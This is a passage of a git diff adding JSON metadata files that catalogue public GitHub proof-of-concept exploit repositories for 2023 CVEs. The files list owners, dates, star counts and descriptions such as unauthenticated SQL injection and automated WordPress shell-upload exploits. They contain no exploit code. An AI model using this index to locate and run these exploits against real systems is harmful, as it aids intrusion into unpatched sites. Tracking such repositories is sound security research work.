"d4op\/CVE-2023-51764-POC", + "owner": { + "login": "d4op", + "id": 11721930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11721930?v=4", + "html_url": "https:\/\/github.com\/d4op", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4op\/CVE-2023-51764-POC", + "description": "just idea, no cp pls", + "fork": false, + "created_at": "2023-12-31T14:33:26Z", + "updated_at": "2024-01-25T21:28:13Z", + "pushed_at": "2024-01-03T21:47:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739273926, + "name": "CVE-2023-51764", + "full_name": "Double-q1015\/CVE-2023-51764", + "owner": { + "login": "Double-q1015", + "id": 77765134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77765134?v=4", + "html_url": "https:\/\/github.com\/Double-q1015", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Double-q1015\/CVE-2023-51764", + "description": "CVE-2023-51764 poc", + "fork": false, + "created_at": "2024-01-05T07:07:47Z", + "updated_at": "2024-01-05T07:12:42Z", + "pushed_at": "2024-01-05T07:12:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5178.json b/2023/CVE-2023-5178.json new file mode 100644 index 0000000000..ce2c08e595 --- /dev/null +++ b/2023/CVE-2023-5178.json @@ -0,0 +1,33 @@ +[ + { + "id": 753172434, + "name": "CVE-2023-5178", + "full_name": "rockrid3r\/CVE-2023-5178", + "owner": { + "login": "rockrid3r", + "id": 112623010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112623010?v=4", + "html_url": "https:\/\/github.com\/rockrid3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockrid3r\/CVE-2023-5178", + "description": "Exploit for CVE-2023-5178", + "fork": false, + "created_at": "2024-02-05T15:58:24Z", + "updated_at": "2024-05-24T10:17:06Z", + "pushed_at": "2024-05-17T18:39:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51800.json b/2023/CVE-2023-51800.json new file mode 100644 index 0000000000..adee7f2b05 --- /dev/null +++ b/2023/CVE-2023-51800.json @@ -0,0 +1,33 @@ +[ + { + "id": 742038737, + "name": "CVE-2023-51800", + "full_name": "geraldoalcantara\/CVE-2023-51800", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51800", + "description": "Multiple cross-site scripting (XSS) vulnerabilities in School Fees Management System v1.0.", + "fork": false, + "created_at": "2024-01-11T16:28:04Z", + "updated_at": "2024-02-16T12:23:21Z", + "pushed_at": "2024-03-01T11:58:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51801.json b/2023/CVE-2023-51801.json new file mode 100644 index 0000000000..2fe16a68e5 --- /dev/null +++ b/2023/CVE-2023-51801.json @@ -0,0 +1,33 @@ +[ + { + "id": 742057874, + "name": "CVE-2023-51801", + "full_name": "geraldoalcantara\/CVE-2023-51801", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51801", + "description": "Simple Student Attendance System v.1.0 - Multiple SQL injection vulnerabilities - student_form.php and class_form.php", + "fork": false, + "created_at": "2024-01-11T17:14:33Z", + "updated_at": "2024-03-01T12:02:08Z", + "pushed_at": "2024-03-01T11:59:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51802.json b/2023/CVE-2023-51802.json new file mode 100644 index 0000000000..33f093cf5a --- /dev/null +++ b/2023/CVE-2023-51802.json @@ -0,0 +1,33 @@ +[ + { + "id": 742063325, + "name": "CVE-2023-51802", + "full_name": "geraldoalcantara\/CVE-2023-51802", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51802", + "description": "Simple Student Attendance System v.1.0 - Cross-site scripting (XSS) vulnerabilities in attendance_report", + "fork": false, + "created_at": "2024-01-11T17:28:16Z", + "updated_at": "2024-02-16T12:23:23Z", + "pushed_at": "2024-03-01T12:00:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51810.json b/2023/CVE-2023-51810.json new file mode 100644 index 0000000000..5ee7185479 --- /dev/null +++ b/2023/CVE-2023-51810.json @@ -0,0 +1,33 @@ +[ + { + "id": 741587636, + "name": "CVE-2023-51810", + "full_name": "Pastea\/CVE-2023-51810", + "owner": { + "login": "Pastea", + "id": 24623933, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24623933?v=4", + "html_url": "https:\/\/github.com\/Pastea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pastea\/CVE-2023-51810", + "description": null, + "fork": false, + "created_at": "2024-01-10T17:47:54Z", + "updated_at": "2024-01-11T18:15:29Z", + "pushed_at": "2024-01-15T15:08:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5204.json b/2023/CVE-2023-5204.json new file mode 100644 index 0000000000..778bd730fd --- /dev/null +++ b/2023/CVE-2023-5204.json @@ -0,0 +1,33 @@ +[ + { + "id": 761333708, + "name": "CVE-2023-5204", + "full_name": "RandomRobbieBF\/CVE-2023-5204", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-5204", + "description": "AI ChatBot <= 4.8.9 - Unauthenticated SQL Injection via qc_wpbo_search_response", + "fork": false, + "created_at": "2024-02-21T17:14:15Z", + "updated_at": "2024-10-18T17:58:16Z", + "pushed_at": "2024-02-21T17:15:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-52160.json b/2023/CVE-2023-52160.json new file mode 100644 index 0000000000..17710d530e --- /dev/null +++ b/2023/CVE-2023-52160.json @@ -0,0 +1,33 @@ +[ + { + "id": 763514094, + "name": "eap_pwn", + "full_name": "Helica-core\/eap_pwn", + "owner": { + "login": "Helica-core", + "id": 8072457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8072457?v=4", + "html_url": "https:\/\/github.com\/Helica-core", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Helica-core\/eap_pwn", + "description": "poc of CVE-2023-52160", + "fork": false, + "created_at": "2024-02-26T12:48:07Z", + "updated_at": "2024-09-02T08:32:31Z", + "pushed_at": "2024-02-26T12:51:54Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5217.json b/2023/CVE-2023-5217.json new file mode 100644 index 0000000000..6382b91e76 --- /dev/null +++ b/2023/CVE-2023-5217.json @@ -0,0 +1,95 @@ +[ + { + "id": 701187998, + "name": "cve-2023-5217-poc", + "full_name": "UT-Security\/cve-2023-5217-poc", + "owner": { + "login": "UT-Security", + "id": 142931531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142931531?v=4", + "html_url": "https:\/\/github.com\/UT-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UT-Security\/cve-2023-5217-poc", + "description": "A PoC to trigger CVE-2023-5217 from the Browser WebCodecs or MediaRecorder interface.", + "fork": false, + "created_at": "2023-10-06T05:46:16Z", + "updated_at": "2024-08-26T17:42:58Z", + "pushed_at": "2023-10-11T04:30:03Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 15, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 701294663, + "name": "platform_external_libvpx_v1.8.0_CVE-2023-5217", + "full_name": "Trinadh465\/platform_external_libvpx_v1.8.0_CVE-2023-5217", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_external_libvpx_v1.8.0_CVE-2023-5217", + "description": null, + "fork": false, + "created_at": "2023-10-06T10:43:38Z", + "updated_at": "2023-10-06T10:45:57Z", + "pushed_at": "2023-10-06T10:46:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 701301269, + "name": "platform_external_libvpx_v1.4.0_CVE-2023-5217", + "full_name": "Trinadh465\/platform_external_libvpx_v1.4.0_CVE-2023-5217", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_external_libvpx_v1.4.0_CVE-2023-5217", + "description": null, + "fork": false, + "created_at": "2023-10-06T11:01:08Z", + "updated_at": "2023-10-06T11:04:35Z", + "pushed_at": "2023-10-06T11:05:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-52251.json b/2023/CVE-2023-52251.json new file mode 100644 index 0000000000..9dca996657 --- /dev/null +++ b/2023/CVE-2023-52251.json @@ -0,0 +1,38 @@ +[ + { + "id": 739727093, + "name": "CVE-2023-52251-POC", + "full_name": "BobTheShoplifter\/CVE-2023-52251-POC", + "owner": { + "login": "BobTheShoplifter", + "id": 22559547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22559547?v=4", + "html_url": "https:\/\/github.com\/BobTheShoplifter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BobTheShoplifter\/CVE-2023-52251-POC", + "description": "CVE-2023-52251 There is a Remote Code Execution vulnerability provectus\/kafka-ui.", + "fork": false, + "created_at": "2024-01-06T11:07:36Z", + "updated_at": "2024-12-31T02:23:38Z", + "pushed_at": "2024-01-23T19:06:14Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-52251", + "kafka-ui", + "poc" + ], + "visibility": "public", + "forks": 3, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-52268.json b/2023/CVE-2023-52268.json new file mode 100644 index 0000000000..b5fd98e0dc --- /dev/null +++ b/2023/CVE-2023-52268.json @@ -0,0 +1,33 @@ +[ + { + "id": 871811221, + "name": "CVE-2023-52268", + "full_name": "squ1dw3rm\/CVE-2023-52268", + "owner": { + "login": "squ1dw3rm", + "id": 87349040, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87349040?v=4", + "html_url": "https:\/\/github.com\/squ1dw3rm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/squ1dw3rm\/CVE-2023-52268", + "description": "Authentication Bypass for FreeScout End-User Portal", + "fork": false, + "created_at": "2024-10-13T02:17:03Z", + "updated_at": "2024-10-13T02:50:46Z", + "pushed_at": "2024-10-13T02:50:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-52654.json b/2023/CVE-2023-52654.json new file mode 100644 index 0000000000..d67a97a3e6 --- /dev/null +++ b/2023/CVE-2023-52654.json @@ -0,0 +1,33 @@ +[ + { + "id": 798468145, + "name": "CVE-2023-52654", + "full_name": "FoxyProxys\/CVE-2023-52654", + "owner": { + "login": "FoxyProxys", + "id": 166161106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4", + "html_url": "https:\/\/github.com\/FoxyProxys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2023-52654", + "description": null, + "fork": false, + "created_at": "2024-05-09T20:53:03Z", + "updated_at": "2024-05-09T21:25:58Z", + "pushed_at": "2024-05-09T21:25:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-52709.json b/2023/CVE-2023-52709.json new file mode 100644 index 0000000000..e504649909 --- /dev/null +++ b/2023/CVE-2023-52709.json @@ -0,0 +1,33 @@ +[ + { + "id": 825866082, + "name": "CVE-2023-52709-PoC", + "full_name": "KevinMitchell-OSWP-CISSP\/CVE-2023-52709-PoC", + "owner": { + "login": "KevinMitchell-OSWP-CISSP", + "id": 15947372, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15947372?v=4", + "html_url": "https:\/\/github.com\/KevinMitchell-OSWP-CISSP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KevinMitchell-OSWP-CISSP\/CVE-2023-52709-PoC", + "description": "PoC for 2023-52709 - TI Bluetooth stack can fail to generate a resolvable Random Private Address (RPA) leading to DoS for already bonded peer devices. ", + "fork": false, + "created_at": "2024-07-08T16:48:29Z", + "updated_at": "2024-10-17T03:53:01Z", + "pushed_at": "2024-09-26T15:27:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5324.json b/2023/CVE-2023-5324.json new file mode 100644 index 0000000000..657e502d91 --- /dev/null +++ b/2023/CVE-2023-5324.json @@ -0,0 +1,33 @@ +[ + { + "id": 698743355, + "name": "eero-zero-length-ipv6-options-header-dos", + "full_name": "nomis\/eero-zero-length-ipv6-options-header-dos", + "owner": { + "login": "nomis", + "id": 70171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70171?v=4", + "html_url": "https:\/\/github.com\/nomis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nomis\/eero-zero-length-ipv6-options-header-dos", + "description": "eeroOS Ethernet Interface Denial of Service Vulnerability (CVE-2023-5324)", + "fork": false, + "created_at": "2023-09-30T20:32:51Z", + "updated_at": "2024-08-22T12:20:43Z", + "pushed_at": "2023-10-01T08:03:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5360.json b/2023/CVE-2023-5360.json new file mode 100644 index 0000000000..a69deedb22 --- /dev/null +++ b/2023/CVE-2023-5360.json @@ -0,0 +1,238 @@ +[ + { + "id": 708041487, + "name": "CVE-2023-5360", + "full_name": "sagsooz\/CVE-2023-5360", + "owner": { + "login": "sagsooz", + "id": 38169010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38169010?v=4", + "html_url": "https:\/\/github.com\/sagsooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sagsooz\/CVE-2023-5360", + "description": "CVE-2023-5360 Auto Shell Upload WordPress Royal Elementor 1.3.78 Shell Upload", + "fork": false, + "created_at": "2023-10-21T10:51:08Z", + "updated_at": "2024-07-02T11:49:48Z", + "pushed_at": "2023-10-21T10:52:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710171154, + "name": "Worpress-CVE-2023-5360", + "full_name": "phankz\/Worpress-CVE-2023-5360", + "owner": { + "login": "phankz", + "id": 137556272, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137556272?v=4", + "html_url": "https:\/\/github.com\/phankz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phankz\/Worpress-CVE-2023-5360", + "description": null, + "fork": false, + "created_at": "2023-10-26T06:56:48Z", + "updated_at": "2024-07-07T07:39:44Z", + "pushed_at": "2023-11-30T07:36:57Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710202087, + "name": "CVE-2023-5360", + "full_name": "nastar-id\/CVE-2023-5360", + "owner": { + "login": "nastar-id", + "id": 57721604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57721604?v=4", + "html_url": "https:\/\/github.com\/nastar-id", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nastar-id\/CVE-2023-5360", + "description": "CVE-2023-5360", + "fork": false, + "created_at": "2023-10-26T08:18:43Z", + "updated_at": "2023-10-26T08:19:55Z", + "pushed_at": "2023-10-26T08:26:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 713201054, + "name": "CVE-2023-5360", + "full_name": "Chocapikk\/CVE-2023-5360", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-5360", + "description": "Exploit for the unauthenticated file upload vulnerability in WordPress's Royal Elementor Addons and Templates plugin (< 1.3.79). CVE-ID: CVE-2023-5360.", + "fork": false, + "created_at": "2023-11-02T03:15:44Z", + "updated_at": "2024-08-12T20:32:58Z", + "pushed_at": "2023-11-02T17:57:55Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-5360", + "exploit", + "hacking", + "infosec", + "open-source", + "penetration-testing", + "python", + "remote-code-execution", + "royal-elementor-addons", + "vulnerability", + "web-security", + "wordpress" + ], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 713204555, + "name": "CVE-2023-5360", + "full_name": "tucommenceapousser\/CVE-2023-5360", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-5360", + "description": "Exploit for the unauthenticated file upload vulnerability in WordPress's Royal Elementor Addons and Templates plugin (< 1.3.79). CVE-ID: CVE-2023-5360.", + "fork": false, + "created_at": "2023-11-02T03:28:59Z", + "updated_at": "2024-05-26T21:10:38Z", + "pushed_at": "2023-11-10T07:15:16Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 713655566, + "name": "WP-CVE-2023-5360", + "full_name": "Jenderal92\/WP-CVE-2023-5360", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/WP-CVE-2023-5360", + "description": "Wordpress CVE-2023-5360", + "fork": false, + "created_at": "2023-11-03T00:58:36Z", + "updated_at": "2024-11-17T23:52:22Z", + "pushed_at": "2024-11-17T23:43:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bot-auto-upload", + "bot-scanner-python", + "cve-2023-5360", + "exploit", + "exploit-2023" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714734993, + "name": "CVE-2023-5360", + "full_name": "Pushkarup\/CVE-2023-5360", + "owner": { + "login": "Pushkarup", + "id": 148672587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4", + "html_url": "https:\/\/github.com\/Pushkarup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-5360", + "description": "The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.", + "fork": false, + "created_at": "2023-11-05T18:02:59Z", + "updated_at": "2024-08-26T21:06:11Z", + "pushed_at": "2023-11-05T18:40:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5412.json b/2023/CVE-2023-5412.json new file mode 100644 index 0000000000..a100f54900 --- /dev/null +++ b/2023/CVE-2023-5412.json @@ -0,0 +1,33 @@ +[ + { + "id": 712341472, + "name": "CVE-2023-5412", + "full_name": "RandomRobbieBF\/CVE-2023-5412", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-5412", + "description": "Image horizontal reel scroll slideshow <= 13.2 - Authenticated (Subscriber+) SQL Injection via Shortcode", + "fork": false, + "created_at": "2023-10-31T09:26:21Z", + "updated_at": "2024-08-12T20:32:57Z", + "pushed_at": "2023-10-31T09:32:33Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5521.json b/2023/CVE-2023-5521.json new file mode 100644 index 0000000000..2ab113fe6d --- /dev/null +++ b/2023/CVE-2023-5521.json @@ -0,0 +1,33 @@ +[ + { + "id": 703526370, + "name": "CVE-2023-5521", + "full_name": "Ylarod\/CVE-2023-5521", + "owner": { + "login": "Ylarod", + "id": 30978685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30978685?v=4", + "html_url": "https:\/\/github.com\/Ylarod", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ylarod\/CVE-2023-5521", + "description": "Root takeover via signature spoofing in KernelSU", + "fork": false, + "created_at": "2023-10-11T12:08:31Z", + "updated_at": "2024-11-26T18:44:53Z", + "pushed_at": "2023-10-11T12:34:37Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5538.json b/2023/CVE-2023-5538.json new file mode 100644 index 0000000000..df450a750d --- /dev/null +++ b/2023/CVE-2023-5538.json @@ -0,0 +1,33 @@ +[ + { + "id": 703812630, + "name": "MpOperationLogs", + "full_name": "juweihuitao\/MpOperationLogs", + "owner": { + "login": "juweihuitao", + "id": 110007292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110007292?v=4", + "html_url": "https:\/\/github.com\/juweihuitao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/juweihuitao\/MpOperationLogs", + "description": "CVE-2023-5538 - MpOperationLogs <= 1.0.1 - 未经身份验证的存储跨站点脚本", + "fork": false, + "created_at": "2023-10-12T01:15:09Z", + "updated_at": "2023-10-12T01:15:09Z", + "pushed_at": "2023-10-12T01:49:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5539.json b/2023/CVE-2023-5539.json new file mode 100644 index 0000000000..725b8d41d0 --- /dev/null +++ b/2023/CVE-2023-5539.json @@ -0,0 +1,33 @@ +[ + { + "id": 706569887, + "name": "CVE-2023-5539", + "full_name": "cli-ish\/CVE-2023-5539", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-5539", + "description": null, + "fork": false, + "created_at": "2023-10-18T07:58:25Z", + "updated_at": "2023-10-18T07:58:25Z", + "pushed_at": "2023-10-18T07:58:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5540.json b/2023/CVE-2023-5540.json new file mode 100644 index 0000000000..a3d34315d5 --- /dev/null +++ b/2023/CVE-2023-5540.json @@ -0,0 +1,33 @@ +[ + { + "id": 706569939, + "name": "CVE-2023-5540", + "full_name": "cli-ish\/CVE-2023-5540", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-5540", + "description": null, + "fork": false, + "created_at": "2023-10-18T07:58:33Z", + "updated_at": "2023-10-18T07:58:33Z", + "pushed_at": "2023-10-18T07:58:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + 